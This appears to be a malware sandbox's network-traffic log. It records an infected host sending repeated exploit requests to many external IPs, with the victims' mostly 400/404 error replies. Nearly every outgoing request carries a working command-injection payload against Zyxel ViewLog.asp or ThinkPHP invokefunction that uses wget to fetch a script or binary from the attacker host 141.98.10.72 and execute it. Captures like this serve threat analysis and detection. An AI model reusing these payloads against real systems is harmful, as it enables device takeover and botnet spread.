                                                        Feb 14, 2024 09:35:24.003215075 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:24.675461054 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:26.019273043 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:28.867233992 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:34.242918968 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:44.994564056 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:07.265563965 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1076192.168.2.144201894.121.195.2148080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:24.031132936 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1077192.168.2.145994294.123.242.948080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:24.031192064 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1078192.168.2.144960895.43.103.1598080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:24.504661083 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:24.730796099 CET259INHTTP/1.1 404 Not Found
                                                        Server: WebServer
                                                        Date: Wed, 14 Feb 2024 08:35:20 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 110
                                                        Connection: close
                                                        Data Raw: 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a
                                                        Data Ascii: <title>404 Not Found</title><h1>404 Not Found</h1>The resource requested could not be found on this server.


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1079192.168.2.145479262.29.125.798080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:24.524385929 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1080192.168.2.145413685.209.139.698080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:24.530369997 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:24.782181978 CET1286INHTTP/1.0 400 Bad Request
                                                        Server: squid/3.1.23
                                                        Mime-Version: 1.0
                                                        Date: Wed, 14 Feb 2024 08:09:35 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 3167
                                                        X-Squid-Error: ERR_INVALID_URL 0
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1081192.168.2.1453304112.154.66.6280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:25.199970007 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:25.506974936 CET504INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 349
                                                        Connection: close
                                                        Date: Wed, 14 Feb 2024 08:35:25 GMT
                                                        Server: lighttpd/1.4.37
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1082192.168.2.1442346112.197.23.9080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:25.233129978 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:25.578268051 CET357INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:35:25 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 212
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 76 6e 2d 68 6f 63 68 69 6d 69 6e 68 2d 68 6f 63 68 69 6d 69 6e 68 2d 32 31 2d 31 31 32 2d 31 39 37 2d 32 33 2d 37 34 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>vn-hochiminh-hochiminh-21-112-197-23-74</center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1083192.168.2.1446848112.213.93.17880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:25.237463951 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:25.595331907 CET291INHTTP/1.0 404 Not Found
                                                        X-Frame-Options: sameorigin
                                                        X-XSS-Protection: 1
                                                        Server: WDaemon/4.0
                                                        Date: Wed, 14 Feb 2024 08:35:25 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 93
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 0d 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 3c 2f 42 4f 44 59 3e 0d 0a 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1084192.168.2.1442350112.197.23.9080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:25.239530087 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:25.587788105 CET357INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:35:25 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 212
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 76 6e 2d 68 6f 63 68 69 6d 69 6e 68 2d 68 6f 63 68 69 6d 69 6e 68 2d 32 31 2d 31 31 32 2d 31 39 37 2d 32 33 2d 37 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>vn-hochiminh-hochiminh-21-112-197-23-70</center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1085192.168.2.143526895.128.196.14080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:25.445815086 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:25.691508055 CET430INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:35:25 GMT
                                                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1086192.168.2.144206431.43.157.358080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:28.054207087 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
